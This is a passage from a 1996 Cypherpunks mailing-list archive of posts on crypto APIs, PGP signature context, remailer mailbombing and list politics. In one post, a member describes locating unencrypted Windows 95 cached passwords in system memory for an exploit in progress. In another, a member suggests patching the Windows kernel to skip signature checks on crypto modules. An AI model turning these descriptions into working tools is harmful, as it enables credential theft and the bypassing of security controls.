"Logically" works for "criminals" too.  A drug dealer of any significance 
should never talk about business on the phone.  Yet there are countless 
consensually monitored or tapped conversations in which someone says "we 
really shouldn't talk over the phone, but the shipment will be in Tuesday 
at 3:00.  Have the $$$ ready."

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Wed, 17 Jan 1996 22:18:01 +0800
To: boston-online@cybercom.net
Subject: <fwd> Prejudice on the Internet:  freedom and a whiff of danger
Message-ID: <v02130504ad2240f0feb5@[198.115.179.200]>
MIME-Version: 1.0
Content-Type: text/plain


        Replayed (w/out permission) from Netfuture #4, the 1/15 issue of a
new and unusually thoughtful mailing list Digest from O'Reilly &
Associates. Moderator and editor: Stephen L. Talbot.  Check it out at:
<http://www.ora.com/staff/stevet/netfuture/>  The signal/noise ratio is
delightful, and there were several mini-essays that many here might enjoy
and might wish to respond to.  Recommended by one stimulated reader.
                                _Vin
--------------------------------------------------------------------------

    Response to "The Internet As Terminator" (Netfuture-3)

>From Mark Grundy <Mark.Grundy@cisr.anu.edu.au>

Give us inkblots on a page, and we'll read into them creatures of our
fantasy.  In the shapes of clouds we see the images of our lives, our
dreams, and our hopes and fears.  We've always made myths out of our
jumbled and incomplete experiences.  We've done it with weather, we've
learned to do it with newspapers and tv bites, and we're starting to do
it with the internet.

We judge our world before we experience it.  Our judgement is creative.
It fills in the gaps where our knowledge fails.  It focuses our efforts,
clarifying our visions, identifying our opportunities and threats.
Prejudice -- to judge before experiencing -- is not limited to just one
culture, and it's not a blight on humanity as a species.  Every mammal
has prejudice as part of its survival training.  The trick to mastering
our prejudice is not to purge it and cripple our efficacy, but to accept
its value in the moment, and to rise to the need to change it as
imagination yields to experience.

The main difference between the internet and other social experiences is
not its diversity or complexity, because we can find diversity and
complexity in every community.  What distinguishes the internet most from
other social experiences is how well we can control the experience itself.
We can walk down a crowded city street and see plenty to challenge us, but
we cannot control the bandwidth of that street.  We cannot choose to
encounter people wearing only yellow shirts, or remove anyone from the
street who wears a green shirt.  Yet these facilities come free on the
internet.  Our right to censor our environment no longer wars with our
desire for society and community.  We can have our cake and eat it too.

This heady power -- to give ourselves just the world we want to see,
appeals very strongly to our self-determination.  Ideally, it could help
us make great leaps between who we think we are, and who we believe we
could be.  It can surround us with saints, and screen us from sinners.
But it brings with it some whiff of danger.  If all we see of the
internet is the community we've created for ourselves, then will the
internet make us more or less parochial in our views?  Will our society
become more or less divisive?  Will we see more or less conflict in our
community?

Moreover, the internet is not just a passive world of data sops, as
television has been.  Through the internet, we can not only dream our
lotus dreams, but also act on them remotely, screening ourselves from
direct consequence by distance and anonymity, taking action while
preserving our little myths.

It's not just that we can engage in infantile flamefests with people
we've never met, cackling over our own supposed cleverness, and ignorant
of whatever harm we might have done their feelings.  Sitting in our comfy
chairs at home and armed with a mouse and credit card, we could contribute
money and ideas to the liberation of political prisoners in Turkey, or to
the bombing of a  bank in London -- all without changing our current,
perhaps quite sedentary, lifestyles.  We can wreak change on the world
without being changed by our acts ourselves.

What I would like to ask this group is twofold:  Firstly as we're forced
by the growing volume of internet traffic to make balder value judgements
on what we expose ourselves to, how do we keep from becoming social
ostriches?  How do we balance tolerance against efficiency and purpose?

Secondly, how can we make ourselves accountable for the material
consequences of our broadcasts?  What support, infrastructure and
personal code is necessary before our global internet citizenship becomes
at least as responsible as our national citizenships?  On a cheerier
note, can anyone think of ways that internet citizenship is already more
responsible than national citizenship?

Dr Mark Grundy,                        | Phone:       +61-6-249 0159
Education Co-ordinator,                | Fax:         +61-6-249 0747
CRC for Advanced Computational Systems,| Web: http://cs.anu.edu.au/~Mark.Grundy
The Australian National University,    | ACSys:
0200 Australia

--------------------------------------------------------------------------

    Vin McLellan +The Privacy Guild+ <vin@shore.net>
 53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 17 Jan 1996 16:33:01 +0800
To: cypherpunks@toad.com
Subject: A Modest Proposal: Fattening up the Proles
Message-ID: <ad21ecac030210049202@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:57 AM 1/17/96, tallpaul wrote:

>--
>tallpaul
>
>"To understand the probable outcome of the Libertarian vision, see any
>cyberpunk B movie wherein thousands of diseased, desparate and starving
>families sit around on ratty old couches on the streets watching television
>while rich megalomaniacs appropriate their body parts for their personal
>physical immortality."
>     R. U. Sirius
>     _The Real Cyberpunk Fakebook_


The absurdity of this point is obvious to anyone with a brain. Why would we
want the donors to be "diseased" and "starving"?  It is imperative that
donors be healthy and non-anorexic (we used to use the phrase "fattened
up," but this is no longer au courant).

To keep the proles reasonably healthy, the plutocrats are encouraging the
current wave of exercise videos, ThighMasters, Buns of Steel, etc. And lots
of beer, as the Kobe beef quakers have shown.

Other than this, R. U. has it about right, I think.

(Ironically, I brought up the new book, "The Winner Take All Society," at
the last Cypherpunks meeting. No time to discuss it here, but it confirms
my strong belief that we are heading for a economy in which a shrinking
fraction of workers have really valuable things to contribute, and a
growing fraction of the population does not. I had not recalled the
authors, but Strick had a battery-powered laptop and Metricom wireless
modem, and ran an Alta Vista search from where he was sitting: ROBERT FRANK
& PHILIP COOK, The Winner-Take-All Society, New York: The Free Press.)

This may shock some of the newcomers here, who haven't heard this, or who
haven't deduced it from our posts, but many of us are elitists. Or, more
precisely, we are for people looking out for Number One, with the
expectation that many other people simply won't make it.

Think of it as evolution in action.

--Tim May


We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Wed, 17 Jan 1996 11:02:52 +0800
To: cypherpunks@toad.com
Subject: Ann: NOISE.SYS v0.4.1 (should be) available...
Message-ID: <199601170238.VAA25799@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Latest version of NOISE.SYS has been uploaded to ftp.funet.fi,
and a few other sites, as "noise04.zip".

It is a random-noise device driver for DOS, which samples fast
timings between keystrokes, disk access, clock-drift, and even mouse
movement or audio card and hashes with SHA-2 algorithm to generate
some good-quality randomness.

Note changes since previous version: this one defines two devices akin
to random.c patch for Linux, /dev/random and /dev/urandom.  The latter
will output as many bytes as are requested, while the first will only
output as many bits as are estimated to be in the pool.

Source included. 386 req'd.

Take care,

--Rob

(Still waiting on comments or suggestions about earlier versions...)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 17 Jan 1996 19:25:34 +0800
To: <cypherpunks@toad.com
Subject: Re: Alta Vista, Great Stuff!
Message-ID: <2.2.32.19960117111232.0095a67c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:26 PM 1/16/96, Beethoven wrote:
>Imagine your nym is related to something common-place at
>the time of posting.  Even though you may be well known
>under that nym, simple searches for that name will turn up
>loads of crapola, or at least some light entertainment
>for someone searching for oyur past posts.

My name is rare and matched mostly by lists of the highest points of
elevation in each state (Mt. Frissell in Connecticut) and museum shows of
the work of a distant cousin Toni Frissell who was a fashion photographer in
NYC.  Most of the rest is mine.  If you have a common name/nym it would be
harder to track (except by searching for email address rather than name).

DCF

"Now everyone knows that Mohammed and Lee are the most common names in the
world.  Maybe I should change my name to Mohammed Lee."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp, KHIJOL SysAdmin" <erc@dal1820.computek.net>
Date: Wed, 17 Jan 1996 22:16:41 +0800
To: cypherpunks@toad.com
Subject: on being elitist...
Message-ID: <199601171348.IAA16696@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


Tim May said in a recent missive, of which I've deleted (unfortunately)
that "most of us on the list are elitist" because we don't believe that
most people will make it, or some such (please correct or clarify, Tim?)

I would say that an "elitist" is one who believes that the masses (or the
great unwashed, depending on your point of view) are somehow "not
deserving" of surviving or "not worth it", and I would say that that
definition would *not* fit a great many people here.  I think that most
people here are *for* getting crypto out in the hands of *everyone* -
good, easy-to-use, cheap, uunbreakable (for all practical purposes,
anyway) crypto, to use for everything, ranging from telnet sessions to
email.  True, there will be some who will *not* make it into the future,
and those numbers vary (depending on whose vision of the future you
subscribe to), but the point is, those who do survive aren't somehow
*better* that those who do not - it may simply be that they are in the
right place at the right time.  Whether or not that place includes the Bay
Area is a subject of debate. 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Wed, 17 Jan 1996 22:19:42 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: Better diversity through Perrymoose.
Message-ID: <199601171348.IAA11579@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 16, 1996 18:09:44, 'Ray Arachelian <sunder@amanda.dorsai.org>'
wrote: 
 
> 
>On Tue, 16 Jan 1996, David Lesher wrote: 
> 
>> Can't we just solve the problem by making it a moderated list;  
>> and make Perry the moderator? 
>>  
> 
>SHIT NO!  NO NO NO NO NO!  NO WAY IN HELL NO!  :)  Cypherpunks will NOT  
>be moderated.  Filtered, spindled and stapled, but never moderated. 
> 
 
Why not two cypherpunk lists: AM & FM. 
 
AM = Attitude Moderated 
 
FM = Frequency Moderated 
 
-- 
tallpaul 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 17 Jan 1996 22:32:47 +0800
To: cypherpunks@toad.com
Subject: A Modest Proposal: Fattening up the Proles
Message-ID: <199601171354.IAA12112@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   TM's statement fits the scientist-become-statesperson
   predilection. It's adduced by the indolent superior-minded
   who relish policy pronouncements over grunge lab work.

   Why else would the fey conceit of worldly wisdom be
   flaunted if not in repugnance at sweaty labor? This
   presumes that nobody in right mind wants a job, but desires
   an esteemed position in society, a title and the perks of
   privilege, with underlings serving.

   Isn't it such delusionary evangelism that keep recruits
   coming to endure the small-minded mono-cultural insultery
   confabulated by these lazy and shiftless pastors, happy as
   pigs in shit, grateful that the heirarchical mindset scam
   works -- even if only through the nauseous flattering of
   their moreso lazy and shiftless benefactors?

   By any means, emulate elitist indolents and avoid anxiety.
   Display iron-fisted civilized beliefs, practice tough-love
   humiliation and master-over-slave manners and militant
   mind-couture, but do nothing truly disruptive of the status
   quo that so rewards niche market exploiters of genuine
   dissent.













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 17 Jan 1996 17:41:07 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Crypto anarchist getting through customs
In-Reply-To: <Pine.SV4.3.91.960116181746.8762E-100000@larry.infi.net>
Message-ID: <Pine.BSD.3.91.960117091755.13335C-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 16 Jan 1996, Alan Horowitz wrote:

> 
> The notorious questionaire to the SEALS wasn't an official action. It was 
> one lieutenient doing an assignment for a night class.
> 
> I never said that the federal government was good, or nice, or useful. 
> 
> Alan Horowitz
> alanh@norfolk.infi.net
> 

	that's the bullshit they would like you to believe.

	in the first place, under military regs, a degree research would 
    be illegal without full permission.  It also was not given to just one
    unit, but to many ==and all identified ones were either SEALS or
    USMC recon and special units --why just he elite and why so many
    groups --all with a blessing...?

	you take your liberal idealism and see how long you have your 
    freedom. your probably one of those who would say "...I have the
    gold so I can buy the gun!" to which I would say, "...ah, but I have 
    the gun, so I will have both your gold and my gun."

	no, I don't follow Bo Geitz, or belong to any of the militias,
    but I expect I am a bit more pragmatic than a liberal.

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gorkab@sanchez.com (Brian Gorka)
Date: Wed, 17 Jan 1996 23:11:33 +0800
To: "'Cypherpunks Mailing List'" <cypherpunks@toad.com>
Subject: RE: MS story
Message-ID: <01BAE4C0.F4B0EF40@loki>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Rich Graves[SMTP:llurch@networking.stanford.edu]
Sent: 	Tuesday, January 16, 1996 2:00 PM
To: 	Simson L. Garfinkel
Subject: 	Re: MS story

   Peter explained a bit about what he *could have* done when he provided
   the source code, and Frank Andrew Stevenson also had some ideas. The
   people below are working on an independent hack that will pop up stored
   passwords for Windows 95, again whether you have the 128-bit RC4 patch
   applied, and have turned off persistent password caching to disk, or
   not. Brian Gorka described the exploit they're working on (but have not
   finished, no) on in a message to cypherpunks:

A friend and I discovered this 'feature' accidentally. (now that I checked 
c2's Hack MSoft page I see someone else exploited it in WFW)  Using 
heapwalker on WFW, we noticed the password cache was not encrypted.  I 
wanted an official C2 I hacked Micro$oft Tee-Shirt and we wondered if this 
was still true after the Windows 95 password cache 'fix'.  We fired up h  
eapwalker and found nothing.  It won't let you look in that area.  BUT, 
After firing up SoftICE for Windows 95, we found the area in less than 5 
minutes.  It is in the C000 0000 memory area (the system area), and the 
password information is ALWAYS a constant offset from some text. (IFSMGR I 
think)  Dumping it out is pretty easy, and as soon as we get some free 
time, the rest of the code will flow, we have something in the way of 
output, but it's not pretty.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Wed, 17 Jan 1996 23:25:30 +0800
To: cypherpunks@toad.com
Subject: Microsoft's CAPI
Message-ID: <199601171502.KAA16060@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


I attended a meeting at Microsoft the other day at which they
described their Crypto API project.  As CAPIs go, it's reasonable
enough; nothing particularly exciting about it or especially wrong
with it (though they don't yet support nonblocking calls to crypto
modules).

They've defined 23 cryptographic services (establish key, encrypt,
etc.) that an application is expected to use for its cryptographic
needs.  The idea is to hide the crypto details (and keys) from
applications, and to make it easy to switch from, say, wimpy
export-approved crypto to good crypto just by switching to another DLL
at load-time.  The cryptography used depends on the crypto modules in
use at runtime.  The API will be part of the WIN32 interface.  The
next version of NT (and windows 95, I think), to be released in a few
months will support loading ``Cryptographic Service Providers'' (CSPs)
that contain the crypto functions that sit below the API.  They have
(or will have soon) an application development kit to allow you to
write code that uses the API, and a CSP development kit to let you
write the crypto functions.

The interesting part is that they say they've made a deal with the
government to allow applications that use the API to be exportable as
long as they don't also try to implement crypto on their own.
Ordinarily, the government claims that ``crypto with a hole''
(applications that call a crypto API) are just as export-controlled as
crypto functions themselves, so this is something of a surprise and
would represent considerable forward progress.  But, of course,
there's a catch.

The OS will not load just any old CSP.  CSPs have to be signed by
Microsoft.  The kernel contains a (hardcoded?) 1024 RSA public key
that it uses to check the signature when the user tries to load a CSP.
If the signature check fails, the CSP won't load.  Microsoft says it
will sign any CSP from anyone AS LONG AS THEY CERTIFY THAT THEY WILL
FOLLOW THE EXPORT RULES.  So you can get your CSP signed if you use
exportable cryptography or if you agree not to send it outside the US
and Canada, etc.  But an end user can't just compile crypto code and
use it as a CSP, even for his or her own use, without getting it
signed by Microsoft first (actually, the CSP development kit does
allow this, but it uses a special version of the OS).

I'm not sure whether this whole thing is good or bad.  One important
issue is whether MS will really sign anyone's CSP or whether they will
start charging high fees or making business-based decisions on who's
CSPs they will allow (with they sign Netscape's CSP, for example).
They say they won't even look or keep a copy of your CSP (at my
suggestion, they are probably going to change the process so that you
send them a hash of your CSP instead of your CSP code when you get the
signature).  For now they promise to sign CSPs for anyone who returns
the export certificate, at no charge.

We (Jack Lacy and I) will probably implement, get signed, and give
away a CryptoLib-based CSP (not for export) for which we will also
make source available so people examine the source to their crypto
(most CSPs will, presumably, not include source).

Despite all this, I think it will be easy to get around the CSP
signature requirements and use homebrew, unsigned crypto even with
pre-compiled .exe files from other sources.  I suspect it will be easy
to write a program, for example, that takes an executable program
and converts CryptoAPI calls to calls that look like just another DLL.
And I'm sure someone will write a program to patch the NT/Windows
kernel to ignore the signature check.  Needless to say, it would be
nice if someone outside the US were to write and distribute programs
to do this.  It would also be nice if someone would write a Unix/Linux
version of the API/CSP mechanism.  It might make it possible to export
applications for those platforms as well.

I haven't tried any of this out yet, but they say they will have beta
versions of the API and CSP developers kits out in a few weeks.  They
say that the API kit will not be export-controlled but the CSP kit
will be.  They plan to announce all this at the RSA conference this
week.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 17 Jan 1996 08:52:07 +0800
To: ckey2@eng.ua.edu (Christopher R. Key)
Subject: Re: A weakness in PGP signatures, and a suggested solution (long)
In-Reply-To: <1996Jan11.152134.127675@ua1ix.ua.edu>
Message-ID: <199601162319.KAA09830@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello ckey2@eng.ua.edu (Christopher R. Key)
  and cypherpunks@toad.com
 
> In article <Pine.ULT.3.91.960110182255.18692H-100000@xdm011>, Jeffrey Goldberg <cc047@Cranfield.ac.uk> says:
...
> First of all, if the recipient is a newsgroup, why would that particular
> information need to be part of the signed information?  If you post to a
...

Somebody already pointed out an adult message being re-posted to a kidgroup.

...
> Secondly, if you are sending email to some one and sign it using pgp, wouldn't
> that person need pgp to prove that in fact you did sign it?  Then it can be
...
> So if all that needs be done to a message to insure that the appropriate 
> person reads it is encrypt it using their public key, why does pgp (or one
> of the pgp interfaces) need to be changed to include header information?  
...

But then the recipient has a PGP-signed message from you which
isn't encrypted (using pgp -d). That person could then impersonate
you. Eg Alice the jilted lover could resend the goodbye message
with forged headers to Bob's new girlfriend to get back at him.

What a sentence. Here it is again, hopefully understandable:

Bob->Alice
  From:Bob; Encrypted(Signed("We're through",Bob),Alice)

Alice does pgp -d, leaving her with Signed("We're through",Bob)

Alice->Carol
  From:Bob; Encrypted(Signed("We're through",Bob),Carol)

Later, when Bob gets another girlfriend,

Alice->Danielle
  From:Bob; Encrypted(Signed("We're through",Bob),Danielle)

Later still,

Alice->Eve
  From:Bob; Encrypted(Signed("We're through",Bob),Eve)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjm@easynet.co.uk (Terence Joseph Mallon)
Date: Wed, 17 Jan 1996 22:42:44 +0800
To: cypherpunks@toad.com
Subject: THE RECIPROCAL ?......
Message-ID: <v01530504ad22b840b54d@[194.154.96.141]>
MIME-Version: 1.0
Content-Type: text/plain


Dear Cypherpunks,

Speaking to a colleague who works at Queen's University of Belfast about
the speculation of someone recently breaking PGP her response was, although
short, very interesting which I thought may be of interest to the
group.....

"When people talk of encryption they use the word break, they are
approaching from one way but not the only way. I am at present trying the
reciprocal, that is, to mend."

I asked her to go into more detail but she declined saying that.....

"The early experiments have worked."

What this means I don't know and she never anwsered whom the work was for
but maybe this is a route which one has not considered - if at all it
exists......the reciprocal ?.....



-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzCsvtYAAAEEANjIsO3Q0cSdEgYifAiA5+aUEVSBFFZTZIpqQXbgXxExsrjk
bFiJ6haaWaD60KPjxH8QJ8PHr9x2tk2K1ktpbcL2+YjPHd+fJzqgz3llu2FV1Xu/
k1C7SWA5G8Do66I0MrQD3/jbAI2zp/0LnVoiI7LWCvPPKoxYCiHdIQ/n5PcJABEB
AAG0JVRlcmVuY2UgSi4gTWFsbG9uIDx0am1AZWFzeW5ldC5jby51az6JAJUDBRAw
uju1Id0hD+fk9wkBAXuUBACjGEmj3AO/rSUD0WRRHdYjDfR8L1FvcV0J/ZNwp7WJ
2cmHvtecLaOlTVWulRhVI6suUSwwzBYZFWmHJA7lR67gLZN8xqWyo/jWPVLDxAte
pdC7ruZI1ZrFc90uPpymnVdC00gwgcG3F4RDQ9B1uY+4KiNG//fULwT6xUVzthak
qA==
=QN61
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 17 Jan 1996 23:38:09 +0800
To: cypherpunks@toad.com
Subject: Re: Information Sent by Netscape during Queries
In-Reply-To: <199601161954.UAA19735@utopia.hacktic.nl>
Message-ID: <199601171520.QAA27492@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


anon-remailer@utopia.hacktic.nl (Anonymous) said:

A> Just back up your Netscape executable, then load it into Emacs (or
A> any editor which can handle arbitrary binary files), search for the
A> "Referer:" string, and change it to an appropriate string of the same
A> length.

A> "MYOB: " sounds like an appropriate string to me...

	I prefer "FuckOff:".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Thu, 18 Jan 1996 01:37:19 +0800
To: jpb@miamisci.org (Joe Block)
Subject: mailbombing and anonymity -- inseparable
In-Reply-To: <v01520c02ad1f92382586@[199.227.1.218]>
Message-ID: <199601152251.PAA07589@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 I wrote:
>
> In fact, it is *in general* impossible to have both
> anonymity and prevention/control of mail-bombing.  Of course
> digital postage will help the problem somewhat by making the
> bombers pay for it, and smarter filters on the recipient's end
> will help, but in general it is a problem we are going to have
> to live with if we want anonymity.
 
 
 An entity calling itself Joe Block allegedly wrote:
>
> Impossible is an awfully strong word.
 
 
Indeed.  And I would be delighted (sort of) if someone could
show me how my assertion above is incorrect.
 
 
> If I was going to implement free digital stamps, I'd have a autoreply
> daemon (stamps@remailer.com) that when sent a mail, would respond with X
> number of valid stamps.
 
 
<snip>


Look I don't actually understand how remailers are currently
implemented, but for the purpose of this discussion it doesn't
matter.  Any sequence of steps that a legitimate correspondant
can use to send a letter a mailbomber can use to send an 
e-mailbomb.


Now you can make the sequence of steps more complex in the 
hope of weeding out the less technically competent mailbombers,
but this is a weak solution which will also make remailnet even
more inaccessible to the barely technically competent people
who make up the vast majority of e-mail users.


Look at it this way.  How can one ensure that one receives only
the kind of e-mail that one likes?  I can think of only 3 ways:


1.  Discriminate based on content.  (killfiles, etc.)
2.  Discriminate based on authorship.  (PGP sigs, reputations,
etc.)
3.  Retaliate against those who send you mail that you didn't
want.  (mail-bombing, reputation-trashing, social or legal
penalties, violence, assassination, etc.)



Now unconditional anonymity (or even "Pretty Good" anonymity a
la cpunks remailers) does away with option #3, right?  (I take 
a moment to note that this is precisely *why* we advocate
anonymity in the first place...)


So that leaves us with option #1 and option #2.  It is
impossible for current computers to reliably identify for us
whether a given e-mail message is junk mail or not.  (I take a
moment to note that when it becomes possible for computers to do
so we will probably have bigger things to worry about...)
  *But* there is a lot that done with regard to discrimination
based on content.  First there's the obvious stuff-- killfiling
topics and keywords (like "NSA" and "ITAR" on cpunks...) and
splitting messages into different folders based on which list
they are from-- and then what about this idea:  someday people 
will include a few micro-dollars in their messages to encourage 
you to read them.  Now that would be interesing.


Now the schemes that I have seen aired here about how to
prevent these kinds of distributed e-mailbombs generally
focussed on a rough version of option #1-- just discriminate
against multiple copies of the same content.  That's fine
(although some of my friends who are always sending me the same
jokes might get left out in the cold...) but you have to realize
that it is a weak fix that can be easily overcome by a
technically sophisticated attacker.


Also I think all such things should be done on the user's end.
I would thank *my* anonymous remailers to let me and my computer
decide what mail to trash.


Of course as always people should pay as they go to send mail.
Thus no direct financial harm is done to the recipient (or even
a pecuniary bonus!  See above) and the remailers could probably 
make a profit off of mailbombers.


I'll leave option #2 alone.  No fresh ideas today.


Okay I've wandered, but to restate my main point mailbombing 
and anonymity are *in general* inseparable.  Just as harassment,
intimidation, blackmail, libel, copyright violations and other 
"information crimes" will be encouraged by anonymity.  Get used
to it, or else stop advocating anonymity.


Regards,

Bryce

PGP sig and clear-text timestamp follow


Mon Jan 15 15:46:21 MST 1996

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMPraYfWZSllhfG25AQGcZwP+L7DwXIksx1cNkqpUDxqlRcfsTw7bmRih
sB5Ib1QQOoP53R9XinFHWdvvrfWx/M5sIlnZ2CweOnGyL8MgpYA+5FBjfrDvkGm9
B1EOzHMsfc0rQBOzERFvque/Kg+ojkIsoCXcvu3K9XUPpBv4iGs7E/oBSkKYX0pC
1cg35pR7SaQ=
=m85b
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mdeindl@vnet.ibm.com ((Michael Deindl))
Date: Thu, 18 Jan 1996 15:05:40 +0800
Subject: Re: A weakness in PGP signatures, and a suggested solution (long)
In-Reply-To: <199601030407.UAA12551@comsec.com>
Message-ID: <MDEINDL.96Jan16102948@standalone.vnet.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Christopher R Key <ckey2@eng.ua.edu> writes:

 > First of all, if the recipient is a newsgroup, why
 > would that particular information need to be part of the signed
 > information?

E.g. if I post some Emacs-worshipping to alt.religion.emacs --- fine.
But if someone forwards this to some serious comp.editor group, maybe
some people don't understand the jokes...

Only one example why it can be neccessarry to include the context
(e.g. the recipient) into the signature.


 > If you post to a newsgroup a message that is only
 > signed (as opposed to encrypted also), then you are obviously not
 > worried about who reads it.

The question is not if I care who reads it.  The question is in which
context (i.e. in which newsgroup) someone reads it.

 > The signature is only a method of
 > proving that the important text (message) is unchanged and intact,
 > and that the person who it is supposed to be from is the same who
 > signed it.

Probably many people don't make this destinction between the message
and the context.  And additionally: I can only proove that someone
forwarded my message to a wrong context, when the context is signed,
too.

Sure, I can include context-information manually, but when we want as
many people as possible using strong-crypto, it should be as
fool-proof as possible.

Therefore I think it would be a good idea to include the context into
the signature.



 > Secondly, if you are sending email to some one and sign it using
 > pgp, wouldn't that person need pgp to prove that in fact you did
 > sign it?  Then it can be reasonable that if that person has pgp to
 > prove the signature, that person has pgp to decrypt mail sent to
 > them.  Simply sign you message and encrypt it using that person's
 > public key.
{SNIP}

Then the receipient decrypts the message, encrypts it under another
person's public-key and forwards it to them.  And so the context has
changed, while my signature is still valid.....


Have a nice day!

Michael Deindl
--


DISCLAIMER: My oppinions are my own, not those of my employer IBM.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Thu, 18 Jan 1996 04:18:34 +0800
To: brett@nmis.nmis.org (Brett Leida)
Subject: Re:
Message-ID: <9601162050.AA12531@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 03:41 PM 1/16/96, you wrote:

>I thought you might find this interesting...

        Thanks, that is very cool beyond just ecommerce, because what does
it mean for personal encryption?  If I buy one of these doo-hickeys for
$100, and so do you, does that mean we don't have to buy an AT&T 3600
(secure phone) to talk securely, and also not have to worry about Clipper
crap?  Or (as it probably is) does that mean we _have_ to talk through this
company and it only sends tiny bits of info from the card reader... (it'd be
cool if you could modify it...)
        Interesting.

>
>found at:http://www.cnn.com/TECH/9601/encryption/index.html
>New security device may broaden business on the web
>
>January 16, 1996
>Web posted at: 9:30 p.m EST (1430 GMT)
>
>>From Correspondent Marsha Walton
>
>ATLANTA (CNN) -- For cyberspace marketers, The World Wide Web is a potential
>world wide mall, an electronic marketplace for consumer goods and services. 
>
>  But for now, most visitors are window-shopping, not buying. A new survey by
>the University of Michigan shows consumers are wary of purchasing goods
>online for fear their credit card numbers will be misappropriated.
>
>  People who think nothing of giving their credit card number to an anonymous
>voice over the phone or handing their card to a waitress at a restaurant,
>flinch at the thought of putting that number into a computer. 
>
>  But a New Jersey, ISED Corp., has created a device that
>secures transactions, both on the Internet and over the telephone. It's
>called SED, or secure encryption
>device. It costs about a hundred dollars, attaches to a
>phone or a PC and operates with the swipe of either a credit or ATM card. 
>
>  "What the device will really allow is consumers a new form
>of payment from home using their ATM card. They'll be able to purchase goods
>and services or whatever on the internet, " said Roger Payne, an engineer
>for BT Labs which is testing the product.
>
>  Potentially vulnerable personal account information is
>scrambled or encrypted on the magnetic stripe on the card. It is
>electronically transferred through the hardware. That eliminates the need 
>to say or "key in" the account number or expiration date. 
>
>  "So that if somebody who is not supposed to be looking at it, they can't
>understand what's in there," said Grant Helmendach whose company BUYPASS
>processes three quarters of a billion financial transactions a year. 
>
>   BUYPASS is marketing SED to "mom and pop" retailers which charge goods by
>making an imprint of credit cards, relying on paper transactions that are
>costlier, and less secure.
>
>   "Lots of folks want to focus on the Walmarts of the world. not a lot of
>people have focused on the smaller specialty shops, specialty retailers, and
>what folks at SED have done, is built a terminal that's very inexpensive, 
>so they can play in this game. They have financial incentive to do that," 
>said Helmendach.
>
>   As buying by computer catches on, the device could eventually be used to pay
>for everything from a pizza delivery to bailing a friend out of jail, and
